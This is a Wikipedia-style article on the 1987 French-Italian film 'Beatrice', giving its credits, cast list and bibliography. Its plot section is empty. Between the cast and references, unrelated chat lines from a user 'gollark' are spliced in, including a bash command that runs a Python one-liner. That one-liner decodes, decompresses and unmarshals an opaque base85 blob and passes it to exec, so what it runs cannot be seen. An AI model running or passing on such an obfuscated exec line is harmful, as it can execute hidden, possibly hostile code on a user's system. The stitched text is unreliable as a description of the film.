Beatrice (1987 film)

Beatrice (French:La passion Béatrice, Italian:Quarto comandamento) is a 1987 French-Italian historical drama film directed by Bertrand Tavernier and starring Bernard-Pierre Donnadieu, Julie Delpy and Nils Tavernier.[2]

Beatrice
Directed byBertrand Tavernier
Produced byAdolphe Viezzi
Written byColo Tavernier-O'Hagan
Starring
Music byRon Carter
CinematographyBruno de Keyzer
Edited byArmand Psenny
Production
company
Cléa Productions - AMLF - TF1 Films Production - Les Films de la Tour - Little Bear (Paris)
Scena Film (Rome)
Distributed byAMLF (France)
Release date
11 November 1987 (France)
Running time
130 minutes
CountryFrance
Italy
LanguageFrench
Box office$4 million[1]

Plot

Cast

  • Bernard-Pierre Donnadieu as François de Cortemart
  • Julie Delpy as Béatrice de Cortemart
  • Nils Tavernier as Arnaud de Cortemart
  • Monique Chaumette as La mère de François
  • Michèle Gleizer as Hélène
  • Maxime Leroux as Richard
  • Jean-Claude Adelin as Bertrand Lemartin
  • Robert Dhéry as Raoul
  • Jean-Louis Grinfeld as Maître Blanche
  • Claude Duneton as The priest
  • Isabelle Nanty as The baby-sitter
  • Jean-Luc Rivals as Jehan
  • Roselyne Vuillaume as Marie
  • Maïté Maillé as La Noiraude
  • Albane Guilhe as La Recluse
  • Marie Privat as Marguerite
  • Sébastien Konieczny as François Enfant
  • Vincent Saint-Ouen as Le père de François enfant
  • Tina Sportolaro as La mère de François enfant
  • François Hadji-Lazaro as Curé départ guerre
  • Nicole Siffre as Pauline
  • Myriam Thomas as Mariette
  • Christophe Rea as Jacques
  • David Ordonez as Thomas
  • Jacques Raynaud as Joseph
  • Pétrus Léo Crombe as Gildas
  • Béatrice Abatut as Blandine
  • Marie Cosnay as Nicolette
  • Sylvie Beyssen, Anne Bolon, Frédérique Figuero, Agnès Hick as Prostituées
gollark: It was contributed by me and actually... was secured.
gollark: Yes.
gollark: Well fix it then.
gollark: That could be fun.
gollark: ```bashpython3 -c 'import zlib,base64,marshal;exec(marshal.loads(zlib.decompress(base64.b85decode("c$`&HO>fjN5Vf6T<8He>aG;1&kT|f1#w`d@P*owS!ilOBAu3-gZ#;Cf<O|zrx6u|ME%*L~?UBEff52bhgq>1pN#r-<=W*VfNrILh->%no=^qv(k~l*gcad<?MUQ(nlFZKo9$+Lr>HkE$2cZn+7$fM(o($*2W}&1V6Udc0<`lfi%AybS25Sl4V%23`z2)TU2I}s3i#56Cc!@uv;o!IPbU4IqAEuQkWUWCZWXWsau6^fs&w@b{ydX1lgRh@l5#!CU#B*|e@5(d&BAAhxcVjg^+rB=aV|22VNo3W?VM{JX!(Q8~RhFeA9xC`&gEl<0L|H-6`W^Q4xHf6VSCg{3{E}u+jwVB&d$y|e-JVkgx+)88v$8g)j{AjFXg&U+yV|I<INNKfEH8?z6msAiaNQvCkf;?KoBIb-NUTV479FWF0a+`Ep2yAB*qBPcVhr+n8Yc-m2c=W1#CCQ@;w8KgY=8eCuTM6U#KaS!ngKI;#p1i|<D;?A5N$_EnO7MYh@&@fmKH@P)tx<!o9H`>voaAG(_^84C5h8x?oMq$v90FOosmjt1EaKv?IBa*f*rr#e)j3zThUOajZmhpnvID#7tyBGkN$Hr9PstqS;zlItvuVk3M{mw)I2P8TnRH)*wJn>ZBW_i8BV1z;#8)p^<6>RgK4UbZfP#Qf~B?nOPAJJ-c5Z8sQU=r%}ZHlu;=9T0}GV6cg?4ilKyRO<2v~ZrTEvz"))))'```

References

Bibliography

  • Greene, Naomi. Landscapes of Loss: The National Past in Postwar French Cinema. Princeton University Press, 1999.
  • Waters, Sandra. Narrating the Italian Historical Novel. ProQuest, 2009.


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.